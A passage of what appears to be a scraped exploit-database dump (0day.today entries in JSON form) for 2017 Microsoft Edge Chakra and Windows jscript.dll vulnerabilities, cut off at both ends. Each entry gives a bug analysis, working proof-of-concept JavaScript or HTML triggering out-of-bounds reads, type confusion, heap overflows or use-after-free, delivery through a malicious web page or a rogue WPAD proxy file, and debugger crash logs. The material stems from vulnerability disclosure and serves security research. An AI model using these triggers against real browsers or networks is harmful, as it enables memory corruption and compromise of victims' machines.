"sourceData": "/*\r\nThe optimizations for memory operations may leave empty loops as follows:\r\n \r\nfor (let i = 0; i < arr.length; i++) {\r\n arr[i] = 0;\r\n}\r\n \r\nBecomes:\r\n \r\nMemset(arr, 0, arr.length);\r\nfor (let i = 0; i < arr.length; i++) {\r\n // empty!\r\n}\r\n \r\nThese empty loops will be removed by \"BackwardPass::RemoveEmptyLoopAfterMemOp\". But this method just removes them without considering branches.\r\n \r\nHere's what may happen.\r\n \r\nA:\r\nMemset(arr, 0, arr.length);\r\n \r\nfor (let i = 0; i < arr.length; i++) {\r\n \r\n}\r\ngoto D; // Actually, this's a \"BrGe_I4\" instruction in the PoC.\r\n \r\nC:\r\n...\r\n \r\nD:\r\n...\r\n \r\nBecomes:\r\n \r\nA:\r\nMemset(arr, 0, arr.length);\r\n \r\nC:\r\n...\r\n \r\nD:\r\n...\r\n \r\nSo, this may break the control flow.\r\n \r\n \r\nPoC:\r\n*/\r\n \r\nfunction opt(a, b, always_true = true) {\r\n a[0] = 1234;\r\n b[0] = 0;\r\n \r\n let arr = a;\r\n if (always_true) {\r\n arr = b;\r\n for (let i = 0; i < arr.length; i++)\r\n arr[i] = 0;\r\n }\r\n \r\n let val = arr[0];\r\n if (val) {\r\n print(val); // Must be 0, but prints out 1234\r\n return true;\r\n }\r\n \r\n return false;\r\n}\r\n \r\nlet a = new Uint32Array(1);\r\nlet b = new Uint32Array(0x1000);\r\nfor (let i = 0; i < 10000; i++) {\r\n if (opt(a, b)) {\r\n break;\r\n }\r\n}\n\n# 0day.today [2018-02-20] #", "sourceHref": "https://0day.today/exploit/29408", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-04T03:40:43", "description": "Exploit for windows platform in category dos / poc", "cvss3": {}, "published": "2018-01-09T00:00:00", "type": "zdt", "title": "Microsoft Edge Chakra asm.js Out-of-Bounds Read Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11911"], "modified": "2018-01-09T00:00:00", "id": "1337DAY-ID-29409", "href": "https://0day.today/exploit/description/29409", "sourceData": "/*\r\nHere's a snippet of AsmJSByteCodeGenerator::EmitAsmJsFunctionBody.\r\n AsmJsVar * initSource = nullptr;\r\n if (decl->sxVar.pnodeInit->nop == knopName)\r\n {\r\n AsmJsSymbol * initSym = mCompiler->LookupIdentifier(decl->sxVar.pnodeInit->name(), mFunction);\r\n if (initSym->GetSymbolType() == AsmJsSymbol::Variable)\r\n {\r\n // in this case we are initializing with value of a constant var\r\n initSource = initSym->Cast<AsmJsVar>();\r\n }\r\n ...\r\n }\r\n ...\r\n if (initSource)\r\n {\r\n if (var->GetType().isDouble())\r\n {\r\n mWriter.AsmReg2(Js::OpCodeAsmJs::Ld_Db, var->GetLocation(), mFunction->GetConstRegister<double>(initSource->GetDoubleInitialiser()));\r\n }\r\n \r\nChakra thinks the PoC is valid asm.js code. What happens when the variable \"b\" gets initialized is:\r\n1. mCompiler->LookupIdentifier is called with \"a\" as the first argument. And it returns the local variable \"a\", which is of type int, but not the double constant \"a\".\r\n2. mFunction->GetConstRegister fails to find the int value in the double constant table. So it returns -1 which leads OOB read.\r\n \r\nPoC:\r\n*/\r\n \r\nfunction createModule() {\r\n 'use asm';\r\n const a = 1.0;\r\n function f() {\r\n var b = a;\r\n var a = 0;\r\n }\r\n \r\n return f;\r\n}\r\nvar f = createModule();\r\nf();\n\n# 0day.today [2018-04-04] #", "sourceHref": "https://0day.today/exploit/29409", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-13T05:47:59", "description": "Exploit for windows platform in category dos / poc", "cvss3": {}, "published": "2018-01-18T00:00:00", "type": "zdt", "title": "Microsoft Edge Chakra - JavascriptGeneratorFunction::GetPropertyBuiltIns Type Confusion Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11914"], "modified": "2018-01-18T00:00:00", "id": "1337DAY-ID-29568", "href": "https://0day.today/exploit/description/29568", "sourceData": "/*\r\nHere's a snippet of the method.\r\nbool JavascriptGeneratorFunction::GetPropertyBuiltIns(Var originalInstance, PropertyId propertyId, Var* value, PropertyValueInfo* info, ScriptContext* requestContext, BOOL* result)\r\n{\r\n if (propertyId == PropertyIds::length)\r\n {\r\n ...\r\n int len = 0;\r\n Var varLength;\r\n if (scriptFunction->GetProperty(scriptFunction, PropertyIds::length, &varLength, NULL, requestContext))\r\n {\r\n len = JavascriptConversion::ToInt32(varLength, requestContext);\r\n }\r\n ...\r\n return true;\r\n }\r\n \r\n return false;\r\n}\r\n \r\n\"JavascriptGeneratorFunction\" is like a wrapper class used to ensure the arguments for \"scriptFunction\". So \"scriptFunction\" must not be exposed to user JavaScript code. But the vulnerable method exposes \"scriptFunction\" as \"this\" when getting the \"length\" property.\r\n \r\nThe code should be like: \"scriptFunction->GetProperty(this, PropertyIds::length, &varLength, NULL, requestContext);\"\r\n \r\nType confusion PoC:\r\n*/\r\n \r\nfunction* f() {\r\n}\r\n \r\nlet g;\r\nf.__defineGetter__('length', function () {\r\n g = this; // g == \"scriptFunction\"\r\n});\r\n \r\n \r\nf.length;\r\n \r\ng.call(0x1234, 0x5678); // type confusion\n\n# 0day.today [2018-04-13] #", "sourceHref": "https://0day.today/exploit/29568", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-02T01:36:24", "description": "There is a heap overflow in jscript.dll when compiling a regex. This issue could potentially be exploited through multiple vectors.", "cvss3": {}, "published": "2017-12-19T00:00:00", "type": "zdt", "title": "Microsoft Windows jscript!RegExpComp::Compile Heap Overflow Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11890"], "modified": "2017-12-19T00:00:00", "id": "1337DAY-ID-29263", "href": "https://0day.today/exploit/description/29263", "sourceData": "Windows: Heap overflow in jscript!RegExpComp::Compile through IE or local network via WPAD \r\n\r\nCVE-2017-11890\r\n\r\n\r\nThere is a heap overflow in jscript.dll when compiling a regex. This issue could potentially be exploited through multiple vectors:\r\n\r\n - An attacker on the local network could exploit this issue by posing as a WPAD (Web Proxy Auto-Discovery) host and sending a malicious wpad.dat file to the victim. This works because wpad.dat files are JavaScript files interpreted with jscript.dll on the WPAD client. Note that, in this case, an attacker who successfully exploited the vulnerability would gain the same privileges as the WinHTTP Web Proxy Auto-Discovery Service.\r\n\r\n - The issue can also be exploited by opening a malicious web page in Internet Explorer. In this case, due to the sizes involved, a 64-bit tab process would most likely be required to trigger the issue. This is going to be the case for example when running IE in the Enhanced Protected Mode.\r\n\r\nThe issue has been verified on 64-bit Win7 and 64-bit Win10 with the most recent patches applied.\r\n\r\nPoC for Internet Explorer:\r\n\r\n============================================\r\n\r\n\r\n<html>\r\n<head>\r\n<meta http-equiv=\"X-UA-Compatible\" content=\"IE=8\"></meta>\r\n</head>\r\n<body>\r\n<script language=\"Jscript.Encode\">\r\n\r\nvar s = 'a';\r\nfor(var i=0;i<28;i++) {\r\n s = s+s;\r\n}\r\ns = s+'[a-z]'+s;\r\n\r\nr = new RegExp();\r\nr.compile(s);\r\n\r\n</script>\r\n</body>\r\n</html>\r\n\r\n============================================\r\n\r\nPoC for WPAD:\r\n\r\n============================================\r\n\r\nfunction FindProxyForURL(url, host) {\r\n\r\n var s = 'a';\r\n for(var i=0;i<28;i++) {\r\n s = s+s;\r\n }\r\n s = s+'[a-z]'+s;\r\n\r\n r = new RegExp();\r\n r.compile(s);\r\n\r\n return \"DIRECT\";\r\n}\r\n\r\n===========================================\r\n\r\nTechnical details:\r\n\r\nThe issue is in RegExpComp::Compile (and several functions called from RegExpComp::Compile). RegExpComp::Compile is responsible for compiling a RegExp object. It maintains a buffer with the compilation result and extends it when necessary. Extending the buffer is handled using RegExpBase::EnsureSpace which looks (approximately) like:\r\n\r\nvoid RegExpBase::EnsureSpace(int desired_size) {\r\n if(desired_size > buffer_size) {\r\n if(2 * desired_size < desired_size) {\r\n //throw an exception\r\n }\r\n int new_size = 2 * desired_size;\r\n char * new_buffer = realloc(buffer, new_size);\r\n if(!new_buffer) {\r\n //throw an exception \r\n }\r\n buffer = new_buffer;\r\n buffer_size = new_size;\r\n }\r\n}\r\n\r\nNote that desired_size is a signed 32-bit integer. RegExpBase::EnsureSpace has an integer overflow check, however if an overflow happens in the caller (a caller must add the size which it wants to append to the existing content size) and desired_size becomes negative, RegExpBase::EnsureSpace would simply return because of the first if() statement without attempting to extend the buffer.\r\n\r\nIndeed, integer overflows can happen in the several callers of RegExpBase::EnsureSpace. The one being triggered in the PoC is in RegExpComp::Compile, when it attempts to append the raw input string to the buffer towards the end of the compilation process.\r\n\r\nDebug log (from IE, but it looks similar in the WPAD service):\r\n\r\n============================================\r\n\r\n(b90.698): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\nmsvcrt!memcpy+0x1d9:\r\n000007fe`fefe123d 668901 mov word ptr [rcx],ax ds:00000002`5bb60fe0=????\r\n\r\n0:012> r\r\nrax=0000000040000061 rbx=00000000042b7ea0 rcx=000000025bb60fe0\r\nrdx=fffffffdfa4b0010 rsi=00000000042b5f48 rdi=000000004000000a\r\nrip=000007fefefe123d rsp=0000000012399ef8 rbp=0000000012399f28\r\n <a href=\"https://crrev.com/8\" title=\"\" class=\"\" rel=\"nofollow\">r8</a>=0000000040000008 <a href=\"https://crrev.com/9\" title=\"\" class=\"\" rel=\"nofollow\">r9</a>=0000000000000000 <a href=\"https://crrev.com/10\" title=\"\" class=\"\" rel=\"nofollow\">r10</a>=6100610061006100\r\n<a href=\"https://crrev.com/11\" title=\"\" class=\"\" rel=\"nofollow\">r11</a>=000000021bb60fd8 <a href=\"https://crrev.com/12\" title=\"\" class=\"\" rel=\"nofollow\">r12</a>=0000000016010fe8 <a href=\"https://crrev.com/13\" title=\"\" class=\"\" rel=\"nofollow\">r13</a>=000007feebc91670\r\n<a href=\"https://crrev.com/14\" title=\"\" class=\"\" rel=\"nofollow\">r14</a>=0000000020000001 <a href=\"https://crrev.com/15\" title=\"\" class=\"\" rel=\"nofollow\">r15</a>=0000000000000000\r\niopl=0 nv up ei pl nz na pe nc\r\ncs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202\r\nmsvcrt!memcpy+0x1d9:\r\n000007fe`fefe123d 668901 mov word ptr [rcx],ax ds:00000002`5bb60fe0=????\r\n\r\n0:012> k\r\n # Child-SP RetAddr Call Site\r\n00 00000000`12399ef8 000007fe`ebc88bb3 msvcrt!memcpy+0x1d9\r\n01 00000000`12399f00 000007fe`ebcfacc2 jscript!RegExpComp::Compile+0x1b7\r\n02 00000000`12399f60 000007fe`ebce2118 jscript!RegExpComp::CompileDynamic+0x62\r\n03 00000000`12399fa0 000007fe`ebce3310 jscript!RegExpObj::Compile+0x32c\r\n04 00000000`1239a0f0 000007fe`ebc7c2ec jscript!JsRegExpCompile+0x70\r\n05 00000000`1239a140 000007fe`ebc7a9fe jscript!NatFncObj::Call+0x138\r\n06 00000000`1239a1f0 000007fe`ebc7b234 jscript!NameTbl::InvokeInternal+0x3f8\r\n07 00000000`1239a310 000007fe`ebc79852 jscript!VAR::InvokeByName+0x81c\r\n08 00000000`1239a520 000007fe`ebc79929 jscript!VAR::InvokeDispName+0x72\r\n09 00000000`1239a5a0 000007fe`ebc724b8 jscript!VAR::InvokeByDispID+0x1229\r\n0a 00000000`1239a5f0 000007fe`ebc78ec2 jscript!CScriptRuntime::Run+0x5a6\r\n0b 00000000`1239b3f0 000007fe`ebc78d2b jscript!ScrFncObj::CallWithFrameOnStack+0x162\r\n0c 00000000`1239b600 000007fe`ebc78b95 jscript!ScrFncObj::Call+0xb7\r\n0d 00000000`1239b6a0 000007fe`ebc7e6c0 jscript!CSession::Execute+0x19e\r\n0e 00000000`1239b770 000007fe`ebc870e7 jscript!COleScript::ExecutePendingScripts+0x17a\r\n0f 00000000`1239b840 000007fe`ebc868d6 jscript!COleScript::ParseScriptTextCore+0x267\r\n10 00000000`1239b930 000007fe`ecdf5251 jscript!COleScript::ParseScriptText+0x56\r\n11 00000000`1239b990 000007fe`ed57b320 MSHTML!CActiveScriptHolder::ParseScriptText+0xc1\r\n12 00000000`1239ba10 000007fe`ecdf6256 MSHTML!CScriptCollection::ParseScriptText+0x37f\r\n13 00000000`1239baf0 000007fe`ecdf5c8e MSHTML!CScriptData::CommitCode+0x3d9\r\n14 00000000`1239bcc0 000007fe`ecdf5a11 MSHTML!CScriptData::Execute+0x283\r\n15 00000000`1239bd80 000007fe`ed5b46fb MSHTML!CHtmScriptParseCtx::Execute+0x101\r\n16 00000000`1239bdc0 000007fe`ece98a5b MSHTML!CHtmParseBase::Execute+0x235\r\n17 00000000`1239be60 000007fe`ecd72e39 MSHTML!CHtmPost::Broadcast+0x90\r\n18 00000000`1239bea0 000007fe`ecdccaef MSHTML!CHtmPost::Exec+0x4bb\r\n19 00000000`1239c0b0 000007fe`ecdcca40 MSHTML!CHtmPost::Run+0x3f\r\n1a 00000000`1239c0e0 000007fe`ecdcda12 MSHTML!PostManExecute+0x70\r\n1b 00000000`1239c160 000007fe`ecdd0843 MSHTML!PostManResume+0xa1\r\n1c 00000000`1239c1a0 000007fe`ecdb6fc7 MSHTML!CHtmPost::OnDwnChanCallback+0x43\r\n1d 00000000`1239c1f0 000007fe`ed5e4f78 MSHTML!CDwnChan::OnMethodCall+0x41\r\n1e 00000000`1239c220 000007fe`eccd9d75 MSHTML!GlobalWndOnMethodCall+0x240\r\n1f 00000000`1239c2c0 00000000`77229bbd MSHTML!GlobalWndProc+0x150\r\n20 00000000`1239c340 00000000`772298c2 USER32!UserCallWinProcCheckWow+0x1ad\r\n21 00000000`1239c400 000007fe`f29d4a87 USER32!DispatchMessageWorker+0x3b5\r\n22 00000000`1239c480 000007fe`f29dbabb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555\r\n23 00000000`1239f700 000007fe`fd73572f IEFRAME!LCIETab_ThreadProc+0x3a3\r\n24 00000000`1239f830 000007fe`ee62925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f\r\n25 00000000`1239f860 00000000`773259cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f\r\n26 00000000`1239f8b0 00000000`7745a561 kernel32!BaseThreadInitThunk+0xd\r\n27 00000000`1239f8e0 00000000`00000000 ntdll!RtlUserThreadStart+0x1d\r\n\r\n============================================\r\n\r\n\r\nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse\r\nor a patch has been made broadly available, the bug report will become\r\nvisible to the public.\r\n\r\n\r\n\r\n\r\nFound by: ifratric\n\n# 0day.today [2018-03-01] #", "sourceHref": "https://0day.today/exploit/29263", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-13T14:07:17", "description": "Exploit for windows platform in category dos / poc", "cvss3": {}, "published": "2017-12-19T00:00:00", "type": "zdt", "title": "Microsoft Windows jscript!NameTbl::GetValDef Use-After-Free Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11903"], "modified": "2017-12-19T00:00:00", "id": "1337DAY-ID-29264", "href": "https://0day.today/exploit/description/29264", "sourceData": "Windows: use-after-free in jscript!NameTbl::GetValDef \r\n\r\nCVE-2017-11903\r\n\r\n\r\nThere is a use-after-free vulnerability in jscript.dll. This issue could potentially be exploited through multiple vectors:\r\n\r\n - An attacker on the local network could exploit this issue by posing as a WPAD (Web Proxy Auto-Discovery) host and sending a malicious wpad.dat file to the victim. This works because wpad.dat files are JavaScript files interpreted with jscript.dll on the WPAD client. Note that, in this case, an attacker who successfully exploited the vulnerability would gain the same privileges as the WinHTTP Web Proxy Auto-Discovery Service.\r\n\r\n - The issue can also be exploited by opening a malicious web page in Internet Explorer.\r\n\r\nThe issue has been verified on 64-bit Win7 with the most recent patches applied.\r\n\r\nPoC for Internet Explorer (might require page heap to trigger the crash):\r\n\r\n============================================\r\n\r\n\r\n<meta http-equiv=\"X-UA-Compatible\" content=\"IE=8\"></meta>\r\n<script language=\"Jscript.Encode\">\r\n\r\nvar vars = new Array(100);\r\nfor(var i=0;i<100;i++) vars[i] = {};\r\n\r\nfunction f() {\r\n vars[1] = 1;\r\n CollectGarbage();\r\n return {};\r\n}\r\n\r\nvars[1].toString = f;\r\nArray.prototype.join.call(vars);\r\n\r\n</script>\r\n\r\n============================================\r\n\r\nPoC for WPAD (might require page heap to trigger the crash):\r\n\r\n============================================\r\n\r\nfunction FindProxyForURL(url, host) {\r\n\r\nvar vars = new Array(100);\r\nfor(var i=0;i<100;i++) vars[i] = {};\r\n\r\nfunction f() {\r\n vars[1] = 1;\r\n CollectGarbage();\r\n return {};\r\n}\r\n\r\nvars[1].toString = f;\r\nArray.prototype.join.call(vars);\r\n\r\nreturn \"DIRECT\";\r\n}\r\n\r\n===========================================\r\n\r\nTechnical details:\r\n\r\nThe issue is in NameTbl::GetValDef which is called when an object is converted to a string. The function attempts to call toString() or valueOf() of the NameTbl object 2 times or until the return value isn't an JavaScript object. The issue is that the NameTbl object on which these methods are called isn't explicitly tracked by the garbage collector, which means the object can be deleted inside the toString/valueOf callback (as long as it's not tracked by the garbage collector somewhere else). Basically, toString/valueOf can delete its 'this' object.\r\n\r\nNote that the crash location in the Debug log immediately precedes a virtual method call.\r\n\r\nDebug log (from IE, but it looks similar in the WPAD service):\r\n\r\n============================================\r\n\r\n(a68.e4c): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\njscript!NameTbl::GetValDef+0x58:\r\n000007fe`f5dea398 498b06 mov rax,qword ptr [<a href=\"https://crrev.com/14\" title=\"\" class=\"\" rel=\"nofollow\">r14</a>] ds:00000000`044d9f90=????????????????\r\n\r\n0:013> r\r\nrax=0000000000000001 rbx=000007fef5d7bd50 rcx=00000000044acfa0\r\nrdx=0000000000000000 rsi=0000000012b49fb8 rdi=0000000000000001\r\nrip=000007fef5dea398 rsp=0000000012b49ae0 rbp=0000000000000000\r\n <a href=\"https://crrev.com/8\" title=\"\" class=\"\" rel=\"nofollow\">r8</a>=0000000004309f20 <a href=\"https://crrev.com/9\" title=\"\" class=\"\" rel=\"nofollow\">r9</a>=0000000004309670 <a href=\"https://crrev.com/10\" title=\"\" class=\"\" rel=\"nofollow\">r10</a>=0000000000000081\r\n<a href=\"https://crrev.com/11\" title=\"\" class=\"\" rel=\"nofollow\">r11</a>=0000000012b49a60 <a href=\"https://crrev.com/12\" title=\"\" class=\"\" rel=\"nofollow\">r12</a>=0000000000000080 <a href=\"https://crrev.com/13\" title=\"\" class=\"\" rel=\"nofollow\">r13</a>=0000000000000008\r\n<a href=\"https://crrev.com/14\" title=\"\" class=\"\" rel=\"nofollow\">r14</a>=00000000044d9f90 <a href=\"https://crrev.com/15\" title=\"\" class=\"\" rel=\"nofollow\">r15</a>=0000000000000000\r\niopl=0 nv up ei ng nz ac po cy\r\ncs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010297\r\njscript!NameTbl::GetValDef+0x58:\r\n000007fe`f5dea398 498b06 mov rax,qword ptr [<a href=\"https://crrev.com/14\" title=\"\" class=\"\" rel=\"nofollow\">r14</a>] ds:00000000`044d9f90=????????????????\r\n\r\n0:013> k\r\n # Child-SP RetAddr Call Site\r\n00 00000000`12b49ae0 000007fe`f5dad069 jscript!NameTbl::GetValDef+0x58\r\n01 00000000`12b49b70 000007fe`f5d7de69 jscript!NameTbl::InvokeInternal+0xb07\r\n02 00000000`12b49c90 000007fe`f5d7bf3b jscript!VAR::GetValue+0xa1\r\n03 00000000`12b49ce0 000007fe`f5ddb65d jscript!ConvertToString+0x5b\r\n04 00000000`12b49f60 000007fe`f5d7c2ec jscript!JsArrayJoin+0x38d\r\n05 00000000`12b4a060 000007fe`f5d7a9fe jscript!NatFncObj::Call+0x138\r\n06 00000000`12b4a110 000007fe`f5d786ea jscript!NameTbl::InvokeInternal+0x3f8\r\n07 00000000`12b4a230 000007fe`f5dcdd72 jscript!VAR::InvokeByDispID+0xffffffff`ffffffea\r\n08 00000000`12b4a280 000007fe`f5d7c2ec jscript!JsFncCall+0xc2\r\n09 00000000`12b4a310 000007fe`f5d7a9fe jscript!NatFncObj::Call+0x138\r\n0a 00000000`12b4a3c0 000007fe`f5d7b234 jscript!NameTbl::InvokeInternal+0x3f8\r\n0b 00000000`12b4a4e0 000007fe`f5d79852 jscript!VAR::InvokeByName+0x81c\r\n0c 00000000`12b4a6f0 000007fe`f5d79929 jscript!VAR::InvokeDispName+0x72\r\n0d 00000000`12b4a770 000007fe`f5d724b8 jscript!VAR::InvokeByDispID+0x1229\r\n0e 00000000`12b4a7c0 000007fe`f5d78ec2 jscript!CScriptRuntime::Run+0x5a6\r\n0f 00000000`12b4b5c0 000007fe`f5d78d2b jscript!ScrFncObj::CallWithFrameOnStack+0x162\r\n10 00000000`12b4b7d0 000007fe`f5d78b95 jscript!ScrFncObj::Call+0xb7\r\n11 00000000`12b4b870 000007fe`f5d7e6c0 jscript!CSession::Execute+0x19e\r\n12 00000000`12b4b940 000007fe`f5d870e7 jscript!COleScript::ExecutePendingScripts+0x17a\r\n13 00000000`12b4ba10 000007fe`f5d868d6 jscript!COleScript::ParseScriptTextCore+0x267\r\n14 00000000`12b4bb00 000007fe`ead55251 jscript!COleScript::ParseScriptText+0x56\r\n15 00000000`12b4bb60 000007fe`eb4db320 MSHTML!CActiveScriptHolder::ParseScriptText+0xc1\r\n16 00000000`12b4bbe0 000007fe`ead56256 MSHTML!CScriptCollection::ParseScriptText+0x37f\r\n17 00000000`12b4bcc0 000007fe`ead55c8e MSHTML!CScriptData::CommitCode+0x3d9\r\n18 00000000`12b4be90 000007fe`ead55a11 MSHTML!CScriptData::Execute+0x283\r\n19 00000000`12b4bf50 000007fe`eb5146fb MSHTML!CHtmScriptParseCtx::Execute+0x101\r\n1a 00000000`12b4bf90 000007fe`eadf8a5b MSHTML!CHtmParseBase::Execute+0x235\r\n1b 00000000`12b4c030 000007fe`eacd2e39 MSHTML!CHtmPost::Broadcast+0x90\r\n1c 00000000`12b4c070 000007fe`ead2caef MSHTML!CHtmPost::Exec+0x4bb\r\n1d 00000000`12b4c280 000007fe`ead2ca40 MSHTML!CHtmPost::Run+0x3f\r\n1e 00000000`12b4c2b0 000007fe`ead2da12 MSHTML!PostManExecute+0x70\r\n1f 00000000`12b4c330 000007fe`ead30843 MSHTML!PostManResume+0xa1\r\n20 00000000`12b4c370 000007fe`ead16fc7 MSHTML!CHtmPost::OnDwnChanCallback+0x43\r\n21 00000000`12b4c3c0 000007fe`eb544f78 MSHTML!CDwnChan::OnMethodCall+0x41\r\n22 00000000`12b4c3f0 000007fe`eac39d75 MSHTML!GlobalWndOnMethodCall+0x240\r\n23 00000000`12b4c490 00000000`77709bbd MSHTML!GlobalWndProc+0x150\r\n24 00000000`12b4c510 00000000`777098c2 USER32!UserCallWinProcCheckWow+0x1ad\r\n25 00000000`12b4c5d0 000007fe`f2be4a87 USER32!DispatchMessageWorker+0x3b5\r\n26 00000000`12b4c650 000007fe`f2bebabb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555\r\n27 00000000`12b4f8d0 000007fe`fe88572f IEFRAME!LCIETab_ThreadProc+0x3a3\r\n28 00000000`12b4fa00 000007fe`f5ff925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f\r\n29 00000000`12b4fa30 00000000`775e59cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f\r\n2a 00000000`12b4fa80 00000000`7781a561 kernel32!BaseThreadInitThunk+0xd\r\n2b 00000000`12b4fab0 00000000`00000000 ntdll!RtlUserThreadStart+0x1d\r\n\r\n0:013> !heap -p -a 00000000`044d9f90\r\n address 00000000044d9f90 found in\r\n _DPH_HEAP_ROOT @ 3fd1000\r\n in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)\r\n 3fe0680: 44d9000 2000\r\n 000007fef5f78726 verifier!AVrfDebugPageHeapFree+0x00000000000000a2\r\n 00000000778b4255 ntdll!RtlDebugFreeHeap+0x0000000000000035\r\n 000000007785797c ntdll! ?? ::FNODOBFM::`string'+0x000000000000e982\r\n 000007feff2110c8 msvcrt!free+0x000000000000001c\r\n 000007fef5d7bad2 jscript!NativeErrorProtoObj<16>::`vector deleting destructor'+0x0000000000000022\r\n 000007fef5d7b938 jscript!NameTbl::SetMasterVariant+0x000000000000a240\r\n 000007fef5d942cb jscript!GcAlloc::ReclaimGarbage+0x000000000000034d\r\n 000007fef5d719e2 jscript!GcContext::Reclaim+0x00000000000000ae\r\n 000007fef5d81956 jscript!GcContext::CollectCore+0x000000000000018b\r\n 000007fef5d817a5 jscript!GcContext::Collect+0x0000000000000025\r\n 000007fef5dc42f3 jscript!JsCollectGarbage+0x0000000000000023\r\n 000007fef5d7c2ec jscript!NatFncObj::Call+0x0000000000000138\r\n 000007fef5d7c199 jscript!NameTbl::InvokeInternal+0x0000000000000377\r\n 000007fef5d786ea jscript!VAR::InvokeByDispID+0xffffffffffffffea\r\n 000007fef5d724b8 jscript!CScriptRuntime::Run+0x00000000000005a6\r\n 000007fef5d78ec2 jscript!ScrFncObj::CallWithFrameOnStack+0x0000000000000162\r\n 000007fef5d78d2b jscript!ScrFncObj::Call+0x00000000000000b7\r\n 000007fef5da2084 jscript!NameTbl::InvokeInternal+0x000000000000060f\r\n 000007fef5d786ea jscript!VAR::InvokeByDispID+0xffffffffffffffea\r\n 000007fef5dea422 jscript!NameTbl::GetValDef+0x00000000000000e2\r\n 000007fef5dad069 jscript!NameTbl::InvokeInternal+0x0000000000000b07\r\n 000007fef5d7de69 jscript!VAR::GetValue+0x00000000000000a1\r\n 000007fef5d7bf3b jscript!ConvertToString+0x000000000000005b\r\n 000007fef5ddb65d jscript!JsArrayJoin+0x000000000000038d\r\n 000007fef5d7c2ec jscript!NatFncObj::Call+0x0000000000000138\r\n 000007fef5d7a9fe jscript!NameTbl::InvokeInternal+0x00000000000003f8\r\n 000007fef5d786ea jscript!VAR::InvokeByDispID+0xffffffffffffffea\r\n 000007fef5dcdd72 jscript!JsFncCall+0x00000000000000c2\r\n 000007fef5d7c2ec jscript!NatFncObj::Call+0x0000000000000138\r\n 000007fef5d7a9fe jscript!NameTbl::InvokeInternal+0x00000000000003f8\r\n 000007fef5d7b234 jscript!VAR::InvokeByName+0x000000000000081c\r\n 000007fef5d79852 jscript!VAR::InvokeDispName+0x0000000000000072\r\n\r\n0:013> u rip\r\njscript!NameTbl::GetValDef+0x58:\r\n000007fe`f5dea398 498b06 mov rax,qword ptr [<a href=\"https://crrev.com/14\" title=\"\" class=\"\" rel=\"nofollow\">r14</a>]\r\n000007fe`f5dea39b 488b98e0000000 mov rbx,qword ptr [rax+0E0h]\r\n000007fe`f5dea3a2 488bcb mov rcx,rbx\r\n000007fe`f5dea3a5 ff15b5320400 call qword ptr [jscript!_guard_check_icall_fptr (000007fe`f5e2d660)]\r\n000007fe`f5dea3ab 488b54fc40 mov rdx,qword ptr [rsp+rdi*8+40h]\r\n000007fe`f5dea3b0 4c8d442450 lea <a href=\"https://crrev.com/8\" title=\"\" class=\"\" rel=\"nofollow\">r8</a>,[rsp+50h]\r\n000007fe`f5dea3b5 498bce mov rcx,<a href=\"https://crrev.com/14\" title=\"\" class=\"\" rel=\"nofollow\">r14</a>\r\n000007fe`f5dea3b8 ffd3 call rbx\r\n\r\n============================================\r\n\r\n\r\nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse\r\nor a patch has been made broadly available, the bug report will become\r\nvisible to the public.\r\n\r\n\r\n\r\n\r\nFound by: ifratric\n\n# 0day.today [2018-03-13] #", "sourceHref": "https://0day.today/exploit/29264", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-03T13:11:47", "description": "There is an heap overflow vulnerability in jscript.dll library (used in IE, WPAD and other places). The bug affects 2 functions, JsArrayStringHeapSort and JsArrayFunctionHeapSort.", "cvss3": {}, "published": "2017-12-19T00:00:00", "type": "zdt", "title": "Microsoft Windows Array.sort jscript.dll Heap Overflow Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11907"], "modified": "2017-12-19T00:00:00", "id": "1337DAY-ID-29261", "href": "https://0day.today/exploit/description/29261", "sourceData": "Windows: heap overflow in jscript.dll in Array.sort \r\n\r\nCVE-2017-11907\r\n\r\n\r\nThere is an heap overflow vulnerability in jscript.dll library (used in IE, WPAD and other places). The bug affects 2 functions, JsArrayStringHeapSort and JsArrayFunctionHeapSort.\r\n\r\nPoC for IE (note: page heap might be required to obsorve the crash):\r\n\r\n=========================================\r\n\r\n\r\n<meta http-equiv=\"X-UA-Compatible\" content=\"IE=8\"></meta>\r\n<script language=\"Jscript.Encode\">\r\nvar vars = new Array(100);\r\n\r\nvar arr = new Array(1000);\r\nfor(var i=1;i<600;i++) arr[i] = i;\r\n\r\nvar o = {toString:function() {\r\n for(var i=600;i<1000;i++) {\r\n arr[i] = 1337;\r\n }\r\n}}\r\n\r\nfunction go() {\r\n arr[0] = o;\r\n Array.prototype.sort.call(arr);\r\n}\r\n\r\n\r\ngo();\r\n\r\n</script>\r\n\r\n=========================================\r\n\r\nTechnical details:\r\n\r\nArray.sort is implemented in JsArraySort 